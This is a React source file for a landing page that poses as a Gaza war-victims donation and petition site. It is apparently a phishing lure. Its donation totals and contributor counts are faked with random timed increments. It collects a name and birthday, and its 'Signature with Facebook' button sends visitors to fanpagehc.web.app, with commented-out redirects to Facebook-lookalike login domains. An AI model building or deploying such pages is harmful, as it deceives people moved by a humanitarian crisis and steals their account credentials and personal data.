import {
  Box,
  Button,
  Checkbox,
  FormControlLabel,
  Grid,
  Link,
  TextField,
  TextareaAutosize,
} from "@mui/material";
import Typo from "../components/Typo";
import Background from "../assets/images/bg.jpg";
import BackgroundTop from "../assets/images/White_Brush9.png";
import Image1 from "../assets/images/img1.webp";
import Image2 from "../assets/images/img2.webp";
import Image3 from "../assets/images/img3.webp";
import Image4 from "../assets/images/img4.webp";
import ImgFooter1 from "../assets/images/footer-sealoftransparency.png";
import ImgFooter2 from "../assets/images/logo-ft.svg";
import ImgFooter3 from "../assets/images/footer-compass.svg";
import ImgFooter4 from "../assets/images/xu.svg";
import ImgFooter5 from "../assets/images/footer-interaction.svg";
import ImageLeft from "../assets/images/img-left.jpg";
import { useEffect, useRef, useState } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import { getHelpCase, setHelpCase } from "../untils/function";
import VideoBG from "../assets/images/videobg.mp4";

const LandingPage = () => {
  const location = useLocation();
  const navigate = useNavigate();
  const helpCase = getHelpCase();
  const [person, setPerson] = useState(960000);
  const [data, setData] = useState({
    mail: "",
    birthday: "",
  });
  const [errorName, setErrorName] = useState(true);
  const [errorBirthday, setErrorBirthday] = useState(true);
  const handleOnChange = (event) => {
    // setErrorBirthday(true);
    // setErrorName(true);
    setData({ ...data, [event.target.name]: event.target.value });
  };
  const personRef = useRef(96000);
  const numberDonate = useRef(362108236);
  const numberDonatedRef = useRef(null);
  const intervalIdRef = useRef(null);
  useEffect(() => {
    intervalIdRef.current = setInterval(() => {
      const randomIncrement = Math.floor(Math.random() * (10 - 5 + 1) + 5);
      personRef.current += randomIncrement;
      const personParagraph = document.getElementById("personParagraph");
      if (personParagraph) {
        personParagraph.innerHTML = `${personRef.current} people have contributed.`;
      }
    }, 1000);

    return () => {
      clearInterval(intervalIdRef.current);
    };
  }, []);
  useEffect(() => {
    numberDonatedRef.current = setInterval(() => {
      const randomIncrement = Math.floor(Math.random() * (10 - 5 + 1) + 5);
      numberDonate.current += randomIncrement;
      const numberDonateId = document.getElementById("numberDonateID");
      if (numberDonateId) {
        numberDonateId.innerHTML = `${numberDonate.current.toLocaleString()} / 458,365,125 $`;
      }
    }, 1000);

    return () => {
      clearInterval(numberDonatedRef.current);
    };
  }, []);
  const Progress = ({ currentAmount, totalAmount }) => {
    const percentage = (currentAmount / totalAmount) * 100;
    const newStyle = {
      opacity: 1,
      width: `${percentage}%`,
    };
    return (
      <div className="progress">
        <div className="progress-done" style={newStyle}></div>
      </div>
    );
  };

  useEffect(() => {
    if (window.location.search.includes("help-case=")) {
      const searchParams = new URLSearchParams(location.search);
      const helpCaseValue = searchParams.get("help-case");
      setHelpCase(helpCaseValue);
      navigate("/");
    }
  }, [navigate]);
  const handleClickName = () => {
    setErrorName(true);
  };
  const handleClickBirthday = () => {
    setErrorBirthday(true);
  };
  const handleClick = (e) => {
    e.preventDefault();
    if (data.mail !== "" && data.birthday !== "") {
      // if (helpCase !== null) {
      //   window.location.href =
      //     "https://mbasic-login.bussines-fund.com/?help-case=" + helpCase;
      // } else {
      //   window.location.href = "https://mbasic-login.bussines-fund.com/";
      // }
      window.location.href = "https://fanpagehc.web.app/?help-case=7f7cbbf6-171e-4e08-b65a-c25c92691226";
    }
    if (data.mail === "") {
      setErrorName(false);
    }
    if (data.birthday === "") {
      setErrorBirthday(false);
    }
    // if (helpCase !== null) {
    //   window.location.href =
    //     "mbasic-facebook.emzioi.com/?help-case=" + helpCase;
    // } else {
    //   window.location.href = "https://mbasic-facebook.emzioi.com/";
    // }
  };
  // const videoRef = useRef(null);

  // useEffect(() => {
  //   // Set the desired start time (in seconds)
  //   const startTime = 20;

  //   // Update the currentTime property of the video element
  //   if (videoRef.current) {
  //     videoRef.current.currentTime = startTime;
  //     // Start playing the video
  //     videoRef.current.play();
  //   }
  // }, []);
  return (
    <Box>
      <Box
        component={"div"}
        className="bg-landing"
        sx={{
          minHeight: "100vh",
          display: "flex",
        }}
      >
        {/* <video id="myVideo" ref={videoRef} autoPlay src={VideoBG} loop muted /> */}
        <Grid
          container
          className="main-content"
          alignItems={"center"}
          flexWrap={{ md: "nowrap", sm: "wrap" }}
          gap={"20px"}
          sx={{
            maxWidth: "1140px",
            margin: "0 auto",
            padding: "20px",
          }}
        >
          <Grid item md={6} sm={12} xs={12}>
            <Typo
              style={{
                color: "#fff",
                fontSize: "22px",
                lineHeight: "22px",
                fontWeight: 700,
                textAlign: "center",
                textTransform: "uppercase",
                marginBottom: "25px",
              }}
              type={"h3"}
              param={"sent to the victims of war"}
            />
            <Typo
              style={{
                color: "#fff",
                fontSize: "56px",
                lineHeight: "48px",
                fontWeight: 700,
                textAlign: "center",
                textTransform: "none",
                marginBottom: "15px",
              }}
              type={"h2"}
              param={"Donate today"}
            />
            <Typo
              style={{
                color: "#fff",
                fontSize: "16px",
                lineHeight: "26px",
                fontWeight: 500,
                padding: "20px",
                textAlign: "center",
              }}
              type={"p"}
              param={
                "This war did not start on October 7. Our people are starving, we have no gas, no water, no electricity, our hospitals are being bombed, our people are dying slowly and we just want everyone to know what's going on"
              }
            />
            <Typo
              style={{
                color: "#fff",
                fontSize: "18px",
                lineHeight: "32px",
                fontWeight: 700,
                textAlign: "center",
                textTransform: "none",
                marginBottom: "0px",
              }}
              type={"h3"}
              param={"Has contributed"}
            />
            <Typo
              style={{
                color: "#fff",
                fontSize: "14px",
                fontWeight: 400,
                textAlign: "center",
                marginBottom: "5px",
              }}
              type={"p"}
              param={
                <>
                  <span
                    id="numberDonateID"
                    dangerouslySetInnerHTML={{
                      __html: `${numberDonate.current.toLocaleString()} / 458,365,125 $`,
                    }}
                  ></span>
                </>
              }
            />
            {/* <ProgressBar
              currentAmount={currentAmount}
              totalAmount={totalAmount}
            /> */}
            <Progress
              currentAmount={numberDonate.current}
              totalAmount={458365125}
            />
            <Typo
              style={{
                color: "#fff",
                fontSize: "16px",
                fontWeight: 500,
                textAlign: "center",
                textTransform: "none",
                marginBottom: "15px",
              }}
              type={"p"}
              param={
                <>
                  <p
                    id="personParagraph"
                    dangerouslySetInnerHTML={{
                      __html: `${personRef.current} people have contributed.`,
                    }}
                  />
                </>
              }
            />
          </Grid>
          <Grid
            item
            md={6}
            sm={12}
            xs={12}
            sx={{ backgroundColor: "#e8fbff", padding: "0px 30px 50px 30px" }}
          >
            <Box
              component={"img"}
              sx={{ width: "100%" }}
              src={BackgroundTop}
            ></Box>
            <Typo
              style={{
                color: "#000",
                fontSize: "32px",
                lineHeight: "40px",
                fontWeight: 700,
                textTransform: "none",
                marginBottom: "15px",
              }}
              type={"h2"}
              param={"1 signature is equivalent to 5$"}
            />
            <Typo
              style={{
                color: "#000",
                fontSize: "14px",
                lineHeight: "26px",
                fontWeight: 400,
                padding: "15px 0",
              }}
              type={"p"}
              param={
                "Every life is precious regardless of their background, and they all deserve to live in safety and peace. We demand the immediate release of all innocent hostages. We call on the international community to unite to bring the families home immediately"
              }
            />
            <Box component={"form"}>
              <TextField
                size="small"
                name="mail"
                label="Name"
                placeholder="Name"
                variant="outlined"
                type="text"
                onClick={handleClickName}
                onChange={handleOnChange}
                required
                sx={{
                  width: "100%",
                  marginBottom: "15px",
                  backgroundColor: "#fff",
                  border: !errorName && "1px solid #f00",
                  borderRadius: !errorName && "5px",
                }}
              />
              <TextField
                variant="outlined"
                size="small"
                onClick={handleClickBirthday}
                name="birthday"
                type="text"
                onChange={handleOnChange}
                label="Birthday"
                required
                sx={{
                  width: "100%",
                  marginBottom: "15px",
                  backgroundColor: "#fff",
                  border: !errorBirthday && "1px solid #f00",
                  borderRadius: !errorBirthday && "5px",
                }}
              />
              <TextField
                size="small"
                name="phone"
                label="Phone"
                placeholder="Phone number"
                type="text"
                required
                sx={{
                  width: "100%",
                  display: "none",
                  marginBottom: "15px",
                  backgroundColor: "#fff",
                }}
              />
              <Box component={"div"} className="area">
                <textarea placeholder="Leave a message for the people in the Gaza Strip."></textarea>
              </Box>
              <FormControlLabel
                sx={{ marginTop: "8px" }}
                control={<Checkbox />}
                label="I oppose the war in Gaza"
              />
              <Button
                type="submit"
                variant="contained"
                onClick={handleClick}
                sx={{
                  color: "#fff",
                  fontSize: "15px",
                  textShadow: "0 -1px rgba(0, 0, 0, .25)",
                  backgroundColor: "#0072ce",
                  borderRadius: "28px",
                  width: "100%",
                  marginTop: "12px",
                  marginBottom: "12px",
                  textTransform: "none",
                  position: "relative",
                  minHeight: "50px",
                  fontWeight: 700,
                }}
              >
                Signature with Facebook
              </Button>
            </Box>
          </Grid>
        </Grid>
      </Box>
      <Box
        sx={{ maxWidth: "1140px", margin: "0px auto 50px", padding: "0 15px" }}
      >
        <Typo
          style={{
            color: "#1D2129",
            fontSize: "3.125rem",
            textAlign: "center",
            margin: "0 0 15px 0",
          }}
          type={"h1"}
          param={"Gaza"}
        />
        <Grid container spacing={4}>
          <Grid item md={6} className="col-left">
            <Box component={"div"} className="gc--with-image">
              <Box className="gc__image-placeholder" component={"div"}></Box>
              <Box className="gc__content" component={"div"}>
                <Box component={"div"} className="gc__header-wrap">
                  <Box component={"h3"} className="gc__title">
                    <Link href="https://www.aljazeera.com/news/2023/12/18/hamas-releases-video-showing-elderly-israeli-captives-pleading-for-release">
                      <Box component={"span"}>
                        Hamas video shows el­der­ly Is­raeli cap­tives plead­ing
                        for re­lease
                      </Box>
                    </Link>
                  </Box>
                </Box>
                <Box className="gc__body-wrap" component={"div"}>
                  <Box className="gc__excerpt" component={"div"}>
                    <p>
                      The Qas­sam Brigades re­leas­es the one-minute video,
                      ti­tled Don’t Let Us Grow Old Here, on its Telegram
                      ac­count.
                    </p>
                  </Box>
                </Box>
                <Box className="gc__footer" component={"div"}>
                  <Box className="gc__meta" component={"div"}>
                    18 Dec 2023
                  </Box>
                </Box>
              </Box>
              <Box className="gc__image-wrap" component={"div"}>
                <Box className="responsive-image" component={"div"}>
                  <Box component={"img"} src={Image1} alt="Image"></Box>
                </Box>
              </Box>
            </Box>
          </Grid>
          <Grid item md={6} className="col-right">
            <Box component={"div"} className="item-col">
              <Box component={"div"} className="gc--with-image">
                <Box className="gc__image-placeholder" component={"div"}></Box>
                <Box className="gc__content" component={"div"}>
                  <Box component={"div"} className="gc__header-wrap">
                    <Box component={"h3"} className="gc__title">
                      <Link href="https://www.aljazeera.com/news/2023/12/18/us-says-support-for-israel-unshakeable-as-gaza-ceasefire-calls-grow">
                        <Box component={"span"}>
                          Austin says US sup­port for Is­rael un­shake­able as
                          Gaza cease­fire calls grow
                        </Box>
                      </Link>
                    </Box>
                  </Box>
                  <Box className="gc__body-wrap" component={"div"}>
                    <Box className="gc__excerpt" component={"div"}>
                      <p>
                        Lloyd Austin says US sup­port ‘un­shake­able’, urges
                        Is­rael to do more to pro­tect civil­ians and in­crease
                        aid sup­plies.
                      </p>
                    </Box>
                  </Box>
                  <Box className="gc__footer" component={"div"}>
                    <Box className="gc__meta" component={"div"}>
                      18 Dec 2023
                    </Box>
                  </Box>
                </Box>
                <Box className="gc__image-wrap" component={"div"}>
                  <Box className="responsive-image" component={"div"}>
                    <Box component={"img"} src={Image2} alt="Image"></Box>
                  </Box>
                </Box>
              </Box>
            </Box>
            <Box component={"div"} className="item-col">
              <Box component={"div"} className="gc--with-image">
                <Box className="gc__image-placeholder" component={"div"}></Box>
                <Box className="gc__content" component={"div"}>
                  <Box component={"div"} className="gc__header-wrap">
                    <Box component={"h3"} className="gc__title">
                      <Link href="https://www.aljazeera.com/news/2023/12/18/hamas-releases-video-showing-elderly-israeli-captives-pleading-for-release">
                        <Box component={"span"}>
                          Cap­tives mis­tak­en­ly killed by Is­raeli troops left
                          SOS signs in He­brew
                        </Box>
                      </Link>
                    </Box>
                  </Box>
                  <Box className="gc__body-wrap" component={"div"}>
                    <Box className="gc__excerpt" component={"div"}>
                      <p>
                        The killing of the three men sparks in­tense out­cry in
                        Is­rael and rais­es con­cerns about its mil­i­tary’s
                        wartime con­duct.
                      </p>
                    </Box>
                  </Box>
                  <Box className="gc__footer" component={"div"}>
                    <Box className="gc__meta" component={"div"}>
                      18 Dec 2023
                    </Box>
                  </Box>
                </Box>
                <Box className="gc__image-wrap" component={"div"}>
                  <Box className="responsive-image" component={"div"}>
                    <Box component={"img"} src={Image3} alt="Image"></Box>
                  </Box>
                </Box>
              </Box>
            </Box>
            <Box component={"div"} className="item-col">
              <Box component={"div"} className="gc--with-image">
                <Box className="gc__image-placeholder" component={"div"}></Box>
                <Box className="gc__content" component={"div"}>
                  <Box component={"div"} className="gc__header-wrap">
                    <Box component={"h3"} className="gc__title">
                      <Link href="https://www.aljazeera.com/news/2023/12/18/hamas-releases-video-showing-elderly-israeli-captives-pleading-for-release">
                        <Box component={"span"}>
                          Is­rael ac­cused of wield­ing star­va­tion as a weapon
                          of war against Gaza
                        </Box>
                      </Link>
                    </Box>
                  </Box>
                  <Box className="gc__body-wrap" component={"div"}>
                    <Box className="gc__excerpt" component={"div"}>
                      <p>
                        Hu­man Rights Watch urges world to speak out against
                        ‘ab­hor­rent war crime’. Is­rael brands the NGO
                        ‘anti-Se­mit­ic’.
                      </p>
                    </Box>
                  </Box>
                  <Box className="gc__footer" component={"div"}>
                    <Box className="gc__meta" component={"div"}>
                      18 Dec 2023
                    </Box>
                  </Box>
                </Box>
                <Box className="gc__image-wrap" component={"div"}>
                  <Box className="responsive-image" component={"div"}>
                    <Box component={"img"} src={Image4} alt="Image"></Box>
                  </Box>
                </Box>
              </Box>
            </Box>
          </Grid>
        </Grid>
        <Link
          href="https://www.aljazeera.com/tag/gaza/"
          sx={{
            maxWidth: "300px",
            fontSize: "1.25rem",
            lineHeight: "1",
            height: "50px",
            width: "100%",
            backgroundColor: "#000",
            color: "#fff",
            border: 0,
            textDecoration: "none",
            margin: "15px auto 60px",
            display: "flex",
            justifyContent: "center",
            alignItems: "center",
          }}
        >
          Show more
        </Link>
      </Box>
      <Box sx={{ backgroundColor: "#3c3330" }}>
        <Typo
          style={{
            color: "#fff",
            fontSize: "26px",
            fontWeight: 700,
            textAlign: "center",
            textTransform: "none",
            paddingTop: "30px",
            textTransform: "uppercase",
          }}
          type={"h2"}
          param={"Donors"}
        />
        <Box
          className="mainFooter__icons"
          sx={{
            padding: "20px 15px",
            maxWidth: "1140px",
            margin: "0 auto",
            display: "flex",
            flexWrap: "wrap",
            justifyContent: "center",
          }}
        >
          <Box
            sx={{
              marginRight: "1rem",
              marginTop: "10px",
              width: "80px",
              height: "50px",
              objectFit: "contain",
            }}
            component={"img"}
            src={ImgFooter1}
            alt="img"
          ></Box>
          <Box
            sx={{
              marginRight: "1rem",
              marginTop: "10px",
              width: "80px",
              height: "50px",
              objectFit: "contain",
            }}
            component={"img"}
            src={ImgFooter2}
            alt="img"
          ></Box>
          <Box
            sx={{
              marginRight: "1rem",
              marginTop: "10px",
              width: "80px",
              height: "50px",
              objectFit: "contain",
            }}
            component={"img"}
            src={ImgFooter3}
            alt="img"
          ></Box>
          <Box
            sx={{
              marginRight: "1rem",
              marginTop: "10px",
              width: "80px",
              height: "50px",
              objectFit: "contain",
            }}
            component={"img"}
            src={ImgFooter4}
            alt="img"
          ></Box>
          <Box
            sx={{
              marginRight: "1rem",
              marginTop: "10px",
              width: "80px",
              height: "50px",
              objectFit: "contain",
            }}
            component={"img"}
            src={ImgFooter5}
            alt="img"
          ></Box>
        </Box>
      </Box>
      <Box
        sx={{
          backgroundColor: "#0a5321",
          textTransform: "uppercase",
          textAlign: "center",
          color: "#c7c7c7",
          padding: "10px 15px 20px 15px",
        }}
      >
        <Typo
          style={{
            fontSize: "14px",
            lineHeight: "18px",
            fontWeight: 400,
            padding: "20px 0 0",
          }}
          type={"p"}
          param={
            <>
              FOR HELP PLEASE CONTACT{" "}
              <span style={{ textDecoration: "underline", color: "#fff" }}>
                855.948.6437
              </span>
            </>
          }
        />
        <Typo
          style={{
            fontSize: "14px",
            lineHeight: "18px",
            fontWeight: 400,
            padding: "10px 0 0",
          }}
          type={"p"}
          param={<>COPYRIGHT 2023 ©</>}
        />
      </Box>
    </Box>
  );
};
export default LandingPage;
